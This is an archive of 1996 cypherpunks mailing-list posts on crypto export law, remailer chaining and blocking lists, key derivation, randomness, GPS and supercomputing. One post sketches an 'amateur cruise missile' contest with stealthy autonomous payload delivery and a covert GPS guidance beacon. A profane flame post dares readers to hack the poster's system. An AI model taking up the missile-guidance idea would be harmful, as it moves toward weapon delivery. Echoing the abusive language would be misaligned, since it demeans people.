needed. Given only a nebulous statement like "I > > exported crypto in violation of the ITARs," or "I shipped PGP to Europe," > > is not enough for a case even to be brought to trial. > > You are absolutely wrong. It may not be enough for a conviction, but it > will beat a Rule 29 motion (Motion for a judgment of acquittal) and get > the case to the jury. > > > (If it reached trial, I would expect a defense attorney to move for > > dismissal. Absent any evidence that a crime occurred, absent any proof > > beyond the nebulous hearsay statement of a "braggart," there is simply no > > basis for criminal action.) > > > > "Stupid bragging criminals" may be common, but bragging is not in and of > > itself illegal. There still has to be evidence of a crime. > > Must a jury believe that you were "just bragging" because you now, in a > criminal trial, say that you were? > > > > "Produce the body." > > Perry Mason is only active in re-runs. > > > > > (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the > > body, or witnesses, does this mean I'll be found guilty? To use BU's > > phrasing, "for crying out loud.") > > That's where prosecutorial discretion comes in and a judge's and jury's > common sense comes in if the prosecutor runs amok. > > BTW, I am far more willing to believe you were bragging about whacking > Jimmy Hoffa than about exporting crypto. Think of all the interesting > evidence from this mailing list's archives that prosecutors would attempt > to introduce against you ... > > Not to say that *I* couldn't get you off, but not the way you propose. > > EBD > > > > > --Tim May > > > > We got computers, we're tapping phone lines, I know that that ain't allowed. > > ---------:---------:---------:---------:---------:---------:---------:---- > > Timothy C. May | Crypto Anarchy: encryption, digital money, > > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > > "National borders aren't even speed bumps on the information superhighway." > > > > > > > > > > > YEAH FUCK YOU.. YOUR ALL FUCKING STUPID ... DONT FUCKIN WRITE THIS SHIT.. YER ALL DUMB STUPID LITTLE 5 YEAR OLDS WHO KNOW JACK SHIT.. GET OFF THE FUCKIN SUBJECT YOU LAME ASS WHOREs.. FUCKIN YOU WANT A REAL FELONY.. TRY TO HACK MY SYSTEM... THIS SYTEM CANNOT BE HACKED IF YOU GET ROOT I GIVE YOU PERMISSION TO NUKE MY SYS.. FUCK YOU BASTARDS... STUPID NUTSAKCS. From dsmith at prairienet.org Sun Sep 29 04:19:34 1996 From: dsmith at prairienet.org (David E. Smith) Date: Sun, 29 Sep 1996 19:19:34 +0800 Subject: What about making re-mailers automatically chain? Message-ID: <199609290914.EAA09458@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: gcg at pb.net, cypherpunks at toad.com Date: Sun Sep 29 04:06:38 1996 > Would it be a good idea to have a re-mailer "randomly" decide whether > to > send the mail to the destination or to another re-mailer. If all > re-mailers performed this way, not even the sender would know the path. > The chain could be short sometimes and long others. Granted, there is > a > possibility that every mailer decides to chain instead of sending the > message to the recip, but some clever counter tag could keep the number > of > links to a certain maximum. The "randomness" of this would aid in > traffic > analysis, and of course each mailer that decides to chain the mail > would > encrypt under the next mailer's pub key. Any thoughts? I dunno about that one. Even if the message itself is encrypted, every remailer has to have the address of the final recipient for your plan to work. And if you have cleartext for that message (oops!) then any remailer operator could read it. More traffic is of course a good thing, but I'm just kinda iffy on the concept. dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "Madness takes its toll . . . please have exact change ready." -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMk48IzVTwUKWHSsJAQEMugf5AYs0epJSF5ukk5aKvttFXJTHnBzvCtQH aCgxJnnv6bQGQm2fu8Ot7C9UgFNE8NTHJaPHFAkR21/YgwvhUUNhbUrHgz5zZMJ1 oY3jJJgIyLJsyw/+bsHHQc9oDl5VBr+V8xVQBWNR45N0vHx6wWwH5ZjmhBHEfJcg 97CDvygXh6nYJKQplRJ49wYYT29PMg0dONrQSXtYcH5sAhtPEkTzgIKqg0O3MVen tGG11Vl+0ghK2RIwJCoWKMXsqmJexP06+5AdeOLwHsc0QmPkuweKMvWSkF1R0ubR chHFaGlmduT0zNyGB4gIiWl71DYA2EgGSbxOZaGtEa57gJ8tFHVl1g== =PVbP -----END PGP SIGNATURE----- From erp at digiforest.com Sun Sep 29 04:54:41 1996 From: erp at digiforest.com (Erp) Date: Sun, 29 Sep 1996 19:54:41 +0800 Subject: Cryptography.. Message-ID: What is the maximum encryption allowed to be created. With export restrictions in mind, and without export restrictiosn in mind... Thanks... By WORLD and US standards please... much appreciated.. export from the US to elsewhere that is also.. reply asap is much appreciated From bdavis at thepoint.net Sun Sep 29 05:38:24 1996 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 29 Sep 1996 20:38:24 +0800 Subject: "Confessing to a felony" In-Reply-To: Message-ID: On Sun, 29 Sep 1996, Gerard D. Cochrane Jr. wrote: > On Sun, 29 Sep 1996, Brian Davis wrote: > > > On Fri, 27 Sep 1996, Timothy C. May wrote: > > YEAH FUCK YOU.. YOUR ALL FUCKING STUPID ... DONT FUCKIN WRITE THIS SHIT.. > YER ALL DUMB STUPID LITTLE 5 YEAR OLDS WHO KNOW JACK SHIT.. GET OFF THE > FUCKIN SUBJECT YOU LAME ASS WHOREs.. FUCKIN YOU WANT A REAL FELONY.. TRY > TO HACK MY SYSTEM... THIS SYTEM CANNOT BE HACKED IF YOU GET ROOT I GIVE > YOU PERMISSION TO NUKE MY SYS.. FUCK YOU BASTARDS... STUPID NUTSAKCS. Charming. A juvenile refugee from alt.2600... EBD From pgut001 at cs.auckland.ac.nz Sun Sep 29 06:57:39 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Sun, 29 Sep 1996 21:57:39 +0800 Subject: Transforming variable-length to fixed keys Message-ID: <84399947820692@cs26.cs.auckland.ac.nz> >If the speed of your key generation is an issue, you could do something like: > > key[] = { 0 }; > const int nhashes = 4; > typedef void (*hashfnptr)(byte*, byte*, int); > /* array of hash functions */ > hashfnptr hash[ nhashes ] = { md5, sha1, haval, ... }; > > state = hash[ 0 ]( algorithm, mode, parameters, userKey ); > > for count = 1 to iterations > for length = 1 to keyLength (in hash_output_size blocks) > /* selecting a hash function based on the state */ > state = hash[ state % nhashes ]( state ); > key[ length ] = hash[ state % nhashes]( state, userKey ); > >This provides more expense in hardware for the same expense in software, so >for the same CPU time you get more hardware expense, and could reduce the >iterations for the same security. > >`nhashes' determined by the number of digest algorithms you consider >trustworthy. > >(They need hardware for `nhashes' different digest algorithms). > >You need to do something about resolving the differing output and state sizes. Yeah, that's a particularly evil way of making things harder for people with keysearch engines. That's why in cryptlib when I'm doing something like key exchange I encrypt all the parameters (algorithm, mode, etc etc) along with the session key, so an attacker can't even tell what algorithm you're using[1]. I'd thought of adding some sort of "choose a random algorithm and mode" capability to cryptlib, but the user interface was too difficult to handle (finding a way to let the user specify "We want a choice of DES-CFB, IDEA-OFB, DES-EDE-CBC, or Blowfish-PCBC" is a bit of a pain). In the end I took the easy way out by adding an extended initialisation mode which allows the user to specify the algorithm if they want, but left the possibility of one-algorithm-per-round hashing alone. A problem with using one of a fixed selection of algorithms is that as you add new modes the selection changes, so you need to add more state information to the key which specifies the choice of algorithms, which starts to get messy. I'd still love to add this in some form to keep the NSA amused... perhaps a bit vector of allowable algorithms and modes passed to the setup function. Peter. [1] There's a story from IBM when they were testing a new IBM-internal encryption system for long-haul telecoms applications. They were playing around with bouncing encrypted transmissions off an IBM-owned satellite when they were contacted by the NSA who said "You're not using DES. Stop it". From jya at pipeline.com Sun Sep 29 07:58:47 1996 From: jya at pipeline.com (John Young) Date: Sun, 29 Sep 1996 22:58:47 +0800 Subject: PET_ard Message-ID: <199609291316.NAA15248@pipe4.ny2.usa.pipeline.com> Sci, 20 Sept 1996: "Redefining the Supercomputer" The word is petaflops, computer jargon for 1000 trillion computations per second. Think of it as a year's labor for a powerful workstation compressed into 30 seconds. Think of it, also, as 1000 times the speed of the current computing benchmark, a trillion operations a second -- teraflops -- which is on the verge of becoming a reality at Sandia National Laboratories after 5 years of effort. Now the federal government's high-performance computing program is aiming for a petaflops, and researchers are exploring new technologies, sketching new architectures, and pondering the software challenge of harnessing this staggering computational power. The NSA is a petaflops enthusiast, says a researcher, but "we're not allowed to think about their applications." ----- http://jya.com/petard.txt (20 kb) PET_ard From gary at systemics.com Sun Sep 29 09:33:28 1996 From: gary at systemics.com (Gary Howland) Date: Mon, 30 Sep 1996 00:33:28 +0800 Subject: crypto anarchy vs AP In-Reply-To: <199609281729.KAA05451@mail.pacifier.com> Message-ID: <324E8605.794BDF32@systemics.com> jim bell wrote: > > On a related issue, GPS (global-positioning system) contains a de-accurizing > mis-feature called S/A, which adds a little error to the location as > detected by a receiver. Ostensibly, it was added so that this could be > turned on in wartime, to deny the enemy the ability to make 10-meter fixes. > Turns out that it was kept on all the time, probably because if it WASN'T it > would become politically impossible to de-accurize the system even in wartime. Apparently S/A (selective availability) was turned *off* during the Gulf war. "Military Intelligence" in action. Gary -- "Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown. pub 1024/C001D00D 1996/01/22 Gary Howland Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From paul at fatmans.demon.co.uk Sun Sep 29 10:08:49 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 30 Sep 1996 01:08:49 +0800 Subject: [CRYPTO] (was: sig/noise ratio) Message-ID: <844009091.10211.0@fatmans.demon.co.uk> > > > > Items crypto related but missing the [CRYPTO] header could be > > reposted by well meaning souls. > > > > Other appropriate headers could of course be used. > > > > Brian Yeah, It`s sad that it`s got to this stage now but I support the idea anyway, I`ll start prefixing all my cryptographic code or technical postings with the headers. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org Http://www.cryptography.home.ml.org/ Email for PGP public key, ID: 5BBFAEB1 "Don`t forget to mount a scratch monkey" From paul at fatmans.demon.co.uk Sun Sep 29 10:21:20 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 30 Sep 1996 01:21:20 +0800 Subject: Mousepad RNG's? Message-ID: <844009092.10210.0@fatmans.demon.co.uk> > I just downloaded a copy of the beta version of Datafellows > Windows 3.1 SSH and it asked to move the mouse around to > generate some randomness. In reading Applied Crypto, it > mentioned that there is no such thing as generating > randomness from a personal computer unless something like > a Geiger counter is used. Is there any way to create a > fairly random sample from the mouse? Should one use lots > of jerky movements, or take ones time with it? What applied crypto would have said was that one cannot generate randomness on a computer without reference to an external source, a mouse is as good as any, the real problem is generating random numbers using PRNGs (Pseudo random number generators) which are algorithms that produce statistically random data that may be predictable, in the words of John Von Neumann "Anyone who considers aritmetic methods of generating random numbers is in a state of sin" In brief, a mouse output would be acceptable, just move the mouse any old way around the screen and the data will be random enough for your uses... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org Http://www.cryptography.home.ml.org/ Email for PGP public key, ID: 5BBFAEB1 "Don`t forget to mount a scratch monkey" From dlv at bwalk.dm.com Sun Sep 29 11:18:35 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 30 Sep 1996 02:18:35 +0800 Subject: Making Remailers Widespread [REMAILERS] In-Reply-To: <199609290623.XAA25604@dfw-ix3.ix.netcom.com> Message-ID: Bill Stewart writes: > >Unfortunately, one-way remailers have much fewer uses than two-way remailers > >any many of these uses are abusive. > > I agree, it's a problem; the return address seems to reduce abuse. It's not only a question of traceability... Most "useful" uses of Julf's remailer involved scenarios like someone posting anonymously to a public forum and soliciting replies, or someone contacting another party anonymously and wanting to receive a reply. It was pretty easy for two anonmous parties to establish a dialog. An optional reachable return address (even if the sender can't be traced back and be punished for abuse) makes the system so much more useful for things other than anonymous farting. > >> - A centralized block list (e.g. http://www.remailer.net/block.txt) > >> which all of the form-based remailers could load and reference would > >> allow non-picky operators not to have to handle it themselves > >A single centralized point of failure is bad. Maybe 4 or 5 redundant ones. > >A blocking request sent to one will be replicated in the other automatically > > Good point. A bit tough to implement in a no-brainer out-of-the-box remailer > you gain a bit by having the block list point to an address that's really > a round-robin DNS spinner of some sort, but that still leaves you with > centralization. How about: maintain a list of trusted blocking-list sites (comparable to the list of remailers used for chaining) and when it comes the time to update the local copy of the blocking list, ask a random one on the list; if it's down, ask another random one on the list. There may even be more than one list. :-) > >> - special-case for "postmaster", who may want to block > >> all of foo.domain instead of just postmaster at foo.domain > >> - special-special-case for postmasters of big sites, e.g. aol, net > >> who we may want to ignore? > > >I don't think it's a good idea to suport blocking receivers in an entire > >domain, like *@aol.com. Just say it's not supported. > > Blocking an entire domain like *@aol.com is mostly bad. > Blocking an entire domain like *@myconsultingfirm.com is fine. I think it's also bad, but I suppose the market wants it, so I'm showing below how this can be done. > >> - A sender-blocking list is harder, and may still take human attention > >I don't think it's a good idea to support sender blocking at all. > > There are some spammers you'd like to stop quickly when a Spam Event > is happening. There are broken email gateways that may need blocking. > There are known abusers you might want stopped. And there are folks like > president at whitehouse.gov who can be presumed to be forgeries :-) > A sender-blocking list administered by the Remailer Cabal* would be > a reasonable default for no-brainer remailers, and obviously it > should be possible for remailer-admins to override or ignore if they want. With most ISP's it's trivial to forge one's From: header in SMTP. Switching to another dime-a-dozen throwaway account is also trivial. Just admit that you can't block senders, and don't pretend that you can - false pretenses destroy one's credibility. Timmy the pathological liar posted a rant a few weeks ago on how "remailer operators can't be choose" - usually he's full of shit, but that time he had a point - he must have plagiarized it. > >Would the receiver blocking list be available to everyone to view? That > >sounds like a violation of privacy. Someone suggested on this list that > >(assuming that the entires are addresses that match exactly, not regular > >expressions), one can store hashes of addresses. > > That's worth doing, or at least thinking about seriously. > The most interesting regular expressions are *@domain (which you can > handle by keeping separate block lists for domains and full addresses > (or a merged list that the using remailer checks both)) and > *@*.domain and user@*.domain - e.g. alice at mailserver17.big-isp.com, > which would successfully deliver mail to alice at big-isp.com. > Perhaps the system needs to keep two hashes - hash(alice),hash(big-isp.com) > and check subsets of the domain name? This is creeping featurism, > but it may be the right way to go to set a good precedent. I think I see a way to accomplish this without too much trouble. When an e-mail is directed at u at c4.c3.c2...c1, the code that checks for blocking will search for the following records in the blocking list: u at c4.c3.c2...c1 (exact match) *@c4.c3.c2...c1 (replace user by *) u@*.c3.c2...c1 (replace leftmost .-separated piece of domain by *) *@*.c3.c2...c1 (both) and repeat until there are only 2 components left in the domain name. E.g., if a message is addressed to dlv at under.bwalk.dm.com, the blocking code would compute hashes of the following strings and check for each one's presence in the blocked list: dlv at under.bwalk.dm.com *@under.bwalk.dm.com dlv@*.bwalk.dm.com *@*.bwalk.dm.com dlv@*.dm.com *@*.dm.com and here we stop. This shouldn't take much more CPU time than the blocking code in Lance Cotrell's mixmaster that I just looked at, which loops though all blocking patterns and checks if each one matches. Now, the question is, who would be allowed to add records containing '*' to the blocking list using the cookie protocol? I suggest that it be one of the contacts listed in Internic's database. E.g. joe at some.place.com can add himself to the blocking list using the cookie protocol. If joe tries to add *@*.place.com to the blocking list, the 'bot looks at Internic's database and sees only jim and jeff listed for place.com, so it refuses. On the other hand, jim at some.place.com can add *@*.place.com, joe@*.place.com, etc, because Internet says he's the admin for place.com. Thus a blocking record for cypherpunks at toad.com could be added by anyone listed in toad.com's Internic entry. There's no need for any Remailer Cabal [tinc] to maintain blocking lists. One other suggestion: instead of storing one bit of information (the address is on the list or not), why not have several flag bits. E.g., the blocking list could contain records similar to: hash - e.g. 160-bit SHA flags - e.g. reserve 32 bits If the list is sorted by hash, then using binary search to check whether a value is in it is very fast (much faster than matching wildcards). But at the same time you can retrieve the flags word, which could be used, e.g., to say that an address doesn't wish to block all inciming anonymous e-mail, but only e-mail that appears not to contain a reply block, or whatever other preferences can be stuffed into 32 bits. E.g., one could use 2 or 3 bits to specify the maximum size of a message to be delivered to addresses matching this pattern: 000 for no limit, and nnn for nnn*4K bytes. > One unfortunate result of only using hashed names and not > readable names is that it doesn't help the current remailer operators, > since their existing code doesn't work that way. This seems like a straightforward replacement for a small piece of code in Lance Cotrell's mixmaster (which remains to be written, of course :-). It's probably not hard to plug the same code into other remailers if they're well-written. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Sun Sep 29 11:27:35 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 30 Sep 1996 02:27:35 +0800 Subject: What about making re-mailers automatically chain? In-Reply-To: <199609290914.EAA09458@bluestem.prairienet.org> Message-ID: At 4:14 AM -0500 9/29/96, David E. Smith wrote: >I dunno about that one. Even if the message itself is encrypted, >every remailer has to have the address of the final recipient for >your plan to work. And if you have cleartext for that message ... Actually, as I read the original proposal, it was to only _insert_ additional links. Thus, imagine the following remailer chain, with Alice sending to Zeke through a chain, represented in parentheses (like LISP): Bob(Charles(Dora(Ed(Frank(........Zeke))))....) (All messages are encrypted, etc.) Now, imagine that Charles elects to add two additial chains, XXXX and YYYY (to make them stand out in my representation). From his point on, the chain will look like: (XXXX(YYYY(Dora(Ed(Frank(........Zeke))))....) Likewise, any of the later remailers can add more links, etc. Some dangers are that "lost Dutchman" messages will remain in the system forever. This gets fixed by probablistic criteria, to produce convergence. Or with digital postage, which causes convergence for ontological reasons. Adding new links, or adding "middleman" links, is always possible. We've had several discussions of this over the years. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From paul at fatmans.demon.co.uk Sun Sep 29 12:01:15 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Mon, 30 Sep 1996 03:01:15 +0800 Subject: Mousepad RNG's? Message-ID: <844013772.1731.0@fatmans.demon.co.uk> > At 8:13 PM -0700 9/27/96, James A. Donald wrote: > >Some time ago, at a cypherpunks conference, people were making >all sorts of ridiculous proposals for being really, really, >really, sure that you had real entropy, and a prominent >cypherpunk, possibly Tim May, said, "This is ridiculous: >Nobody ever broke good crypto through weakness in the >source of truly random numbers". Sometime after that >Netscape was broken through weakness in the source of >truly random numbers. This is correct only in the first part, it is true that good cryptography has never been documentably broken through weaknesses in a real random source. The netscape attack was on the PRNG used in netscape, the proverbial state of sin. I don`t know what PRNG netscape used in the broken version, can anyone tell me what they used, and whether it was the PRNG or the seed that was weak, also I would be interested to know what they are using now in terms of the algorithm and seed... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org Http://www.cryptography.home.ml.org/ Email for PGP public key, ID: 5BBFAEB1 "Don`t forget to mount a scratch monkey" From jimbell at pacifier.com Sun Sep 29 12:05:41 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 30 Sep 1996 03:05:41 +0800 Subject: crypto anarchy vs AP Message-ID: <199609291655.JAA28141@mail.pacifier.com> At 04:21 PM 9/29/96 +0200, Gary Howland wrote: >jim bell wrote: >> >> On a related issue, GPS (global-positioning system) contains a de-accurizing >> mis-feature called S/A, which adds a little error to the location as >> detected by a receiver. Ostensibly, it was added so that this could be >> turned on in wartime, to deny the enemy the ability to make 10-meter fixes. >> Turns out that it was kept on all the time, probably because if it WASN'T it >> would become politically impossible to de-accurize the system even in wartime. > >Apparently S/A (selective availability) was turned *off* during the Gulf >war. "Military Intelligence" in action. Yes, because of lack of enough S/A-capable military receivers... They were stuck with using the commercial, off-the-shelf kind. Jim Bell jimbell at pacifier.com From tcmay at got.net Sun Sep 29 12:20:44 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 30 Sep 1996 03:20:44 +0800 Subject: Use of Consumer-grade GPS units in Gulf War In-Reply-To: <199609281729.KAA05451@mail.pacifier.com> Message-ID: At 4:21 PM +0200 9/29/96, Gary Howland wrote: >jim bell wrote: >> >> On a related issue, GPS (global-positioning system) contains a de-accurizing >> mis-feature called S/A, which adds a little error to the location as >> detected by a receiver. Ostensibly, it was added so that this could be >> turned on in wartime, to deny the enemy the ability to make 10-meter fixes. >> Turns out that it was kept on all the time, probably because if it WASN'T it >> would become politically impossible to de-accurize the system even in >>wartime. > >Apparently S/A (selective availability) was turned *off* during the Gulf >war. "Military Intelligence" in action. Actually, there were excellent reasons. First, there was no evidence the Iraqis had any ability to use GPS of any sort (I suspect the odd unit existed in Iraq, but not enough of them to be useful in any meaningful sense.) Second, the military bought a huge pile of _consumer_-grade GPS units, e.g., from Trimble Navigation, to fill a shortage of military-grade units (because of the rapid build-up in ground forces). The reasons for turning off S/A made perfect sense. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Sun Sep 29 12:36:14 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 30 Sep 1996 03:36:14 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) In-Reply-To: <199609291316.NAA15248@pipe4.ny2.usa.pipeline.com> Message-ID: (Hoist by their own petards indeed! Don't tell our Russian what petard means.) At 1:16 PM +0000 9/29/96, John Young wrote: > Sci, 20 Sept 1996: > > "Redefining the Supercomputer" > > The word is petaflops, computer jargon for 1000 > trillion computations per second. Think of it as a > year's labor for a powerful workstation compressed > into 30 seconds. Think of it, also, as 1000 times the > speed of the current computing benchmark, a trillion > operations a second -- teraflops -- which is on the ... I doubt this will be ever be built, at least not as a government-funded "G-job" "one-off" machine. It would, as the full article state, necessitate a kind of "Apollo program" for supercomputers. This, as funding for mega-projects fades. This, as Cray Computer went bankrupt, as Thinking Machines went into Chapter 11 and only recently emerged as a pale shadow of its former self (concentrating on software only), and as Floating Point Systems, NCube, MasPar, etc. are foundering. (Actually, some have already been absorbed into other companies, and in many cases, dissolved. I think FPS was absorbed...) (I could go on...Elxsi, Denelcor, Steve Chen's supercomputer company, Control Data Corporation (pulled the plug on its supercomputers years ago), etc. Probably two dozen companies have tried to enter the "next generation supercomputer" business....) Cray Research (not to be confused with Cray Computer, of course) is now a unit of Silicon Graphics. And my old employer, Intel, is now struggling with its "Supercomputer" business unit (which was once doing moderately well, and was even the performance leader for a while, but which is now being scaled back....) The reasons for the collapse of the market are well-known: the end of communism has lessened certain needs, the cut-backs in defense spending, "the attack of the killer micros" (arrays of cheap micros give better bang-for-the-buck), and, related to the themes of this list, NSA's code-breaking just ain't what it used to be. To wit, if even a petaflops machine, costing billions of dollars and needing a nuclear power plant to power it, cannot make headway on cracking a garden-variety PGP-encrypted message..... (I grant that computers, supercomputers, workstations, arrays of special-purpose hardware, etc. are useful for all sorts of related things, such as signals analysis, filtering of voices, recognition of voices, traffic analysis, etc. But I rather doubt that a single petaflops machine is a good way to go for this.) The "speculative" applications--the "miraworld" simulation environment, for example--are nonsensical. There is no reason for a multibillion dollar petaflops machine to be built so that researchers can schedule a few minutes on it! (They'd rather have 0.1% the peak performance, but constant or assured access, I'm sure.) And so on. I don't see it happening. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From azur at netcom.com Sun Sep 29 13:01:49 1996 From: azur at netcom.com (Steve Schear) Date: Mon, 30 Sep 1996 04:01:49 +0800 Subject: GPS and other Dual-use technologies Message-ID: I used to be an avid RC modeler and have contemplated organizing an on-going amateur cruise missile contest. The object would be to accurately deliver various payload weights over courses of various terrain and distances (perhaps out to a hundred miles or more in the case of Giant Scale craft). Judging would be based on speed, stealth (noise, IR emissions and radar cross section) and accuracy. Craft are free to use any navigational technology, but must be autonomous from launch to delivery. To aid navigation I was considering the design of a substitute differential GPS beacon functionally interchangable with those offered by the USCG. My device would work on a different frequency, possibly using very wideband direct sequence spread spectrum (for low probability of intercept/detection) and be actuated by the missile as it neared the target in order to refine its position. -- Steve PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Steve Schear | Internet: azur at netcom.com Lamarr Labs | Voice: 1-702-658-2654 7075 West Gowan Road | Fax: 1-702-658-2673 Suite 2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- From wombat at mcfeely.bsfs.org Sun Sep 29 14:00:25 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Mon, 30 Sep 1996 05:00:25 +0800 Subject: [RANT] Re: Workers, Public Schools, Tradesmen, and Justice In-Reply-To: <19960929055435234.AAA224@GIGANTE> Message-ID: > The old way was that your HS provided what the mythical average person needed > to go about life. College was for the more "complex" careers. Perhaps "high school" should end at age 16, with two years of publicly funded "junior college" or "technical school" available to those who select one or the other, and qualify. This would bring an adult-level decision earlier in life, and students would need to start thinking about which path to chose at about 14. Perhaps this would allow reality to set in at an earlier age. A high school diploma has become meaningless anyway - it is viewed as a "right." This wouldn't leave anyone condemned to a life of menial labor for a decision made at age 16 - there are plenty of successful people who have obtained a G.E.D. later in life, and then gone on to college. It would, however, give some measure of responsibility to the near-adult. In my own education, I found that I was getting nothing out of high school by age 16. I wanted to drop out of high school to start college, but my parents wouldn't hear of it. I got into an internship-for-credit program instead, and got out w/ diploma and started college a semester later. My fiance did drop out of high school at age 16 and started college, with her parent's blessing. All her high school guidence counselor could come up with was "But she'll miss her prom"! It seemed that the last two years of high school were devoted to trying to drag marginal, apathetic students towards their diploma, kicking and screaming. Anyone "college bound" was just marking time. I wouldn't want my children subjected to this - I'd rather they got into college as soon as they were ready, diploma or not. Just my $.02 -r.w. From Scottauge at aol.com Sun Sep 29 14:01:29 1996 From: Scottauge at aol.com (Scottauge at aol.com) Date: Mon, 30 Sep 1996 05:01:29 +0800 Subject: Key-Escrow Message-ID: <960929141327_113858214@emout06.mail.aol.com> I have a question. There seems to be a lot of excitement over the key escrow stuff da gubermint is trying to install. Couldn't one burn off maybe 10 ** 200 keys and say, hey gubermint dude, these are like, gonna be my keys. Wouldn't this place them into a brute force search if they wanted to play with your info? Doing this will likely add to the tax burden for all dem disk drives needed to store them numbers. :( If ya can't do that, then they must be gonna sell key space like da radio spectrm - which means some number is gonna mean something to someone somewhere - yum yum say the hackers and the crackers. I'm thinking there will be a way no matter what happens.... From jimbell at pacifier.com Sun Sep 29 14:25:22 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 30 Sep 1996 05:25:22 +0800 Subject: The Petaflops Boondoggle Computer (was PET_ard) Message-ID: <199609291850.LAA03605@mail.pacifier.com> At 10:00 AM 9/29/96 -0800, Timothy C. May wrote: >(Hoist by their own petards indeed! Don't tell our Russian what petard means.) Uh, wasn't that the name of the bald captain on Star Trek Next Generation? You know, "Jean-Luc Petard"? >> The word is petaflops, computer jargon for 1000 >> trillion computations per second. Think of it as a >> year's labor for a powerful workstation compressed >> into 30 seconds. Think of it, also, as 1000 times the >> speed of the current computing benchmark, a trillion >> operations a second -- teraflops -- which is on the >... > >I doubt this will be ever be built, at least not as a government-funded >"G-job" "one-off" machine. It would, as the full article state, necessitate >a kind of "Apollo program" for supercomputers. Check out an article in about the September issue of Scientific American, 1966, on the subject of the Illiac IV, which was one of the first attempts at a multiprocessor machine. Originally it was conceived as a 256-processor unit, at 4 million (floating point?) operations per second per processor which would have been 1 giga ops per second, but it was eventually built as a 64-processor unit and turned on in about 1972 or so. The succeeding factor-of-1000 improvement appears (if the item above is accurate) to have taken 24 years to accomplish, so it's hard to imagine that the next factor of 1000 will arrive appreciably sooner than year 2020. >The reasons for the collapse of the market are well-known: the end of >communism has lessened certain needs, the cut-backs in defense spending, >"the attack of the killer micros" (arrays of cheap micros give better >bang-for-the-buck), and, related to the themes of this list, NSA's >code-breaking just ain't what it used to be. Oddly enough, however, we're getting somewhat of an echo of the "big single processor" phenomenon with the micros. We all know that in supercomputers, multiprocessors won out over single processors, and mainframes were just about defeated by microcomputers. Yet a look at Intel's pricing for Pentiums shows that they sell a 120-MHz chip for about $135, while they sell a 200-megahertz version for around $550 or so. Arithmetic suggests that a person would be far better off with a 4-120-MHz-processor Pentium (cumulative clock rate 480 MHz) than a single, 200-megahertz version. (admittedly, peripheral logic costs will adjust this a little.) Of course, this would also leave Intel flat on its ass attempting to compete with AMD, Cyrix, etc, because a somewhat higher speed per cpu is just about the only advantage they have. Jim Bell jimbell at pacifier.com From aba at dcs.ex.ac.uk Sun Sep 29 14:33:17 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Mon, 30 Sep 1996 05:33:17 +0800 Subject: crypto anarchy vs AP In-Reply-To: <199609281729.KAA05451@mail.pacifier.com> Message-ID: <199609291053.LAA00388@server.test.net> Jim Bell writes: > At 02:06 PM 9/26/96 -0500, snow wrote: > >Adam Back wrote: > >> [...] > >> More specifically perhaps they would disconnect key backbones, and > >> ISPs briefly while they rushed into effect a few presidential decrees > >> outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets, > >> etc.) > > > > This would be cutting their own throats. There is SO much commercial > >and government traffic going across 